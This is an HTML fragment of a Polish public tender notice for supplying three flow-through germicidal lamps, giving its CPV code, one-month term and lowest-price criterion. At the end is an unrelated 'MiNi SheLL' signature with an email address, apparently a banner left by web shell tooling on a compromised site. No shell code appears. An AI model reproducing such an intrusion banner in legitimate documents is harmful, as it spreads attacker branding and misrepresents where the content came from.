<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa trzech sztuk lamp bakteriobójczych przepływowych ,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa trzech sztuk lamp bakteriobójczych przepływowych ,której szczegółowy opis zawarty jest w  załączniku nr 2. do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.51.50.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com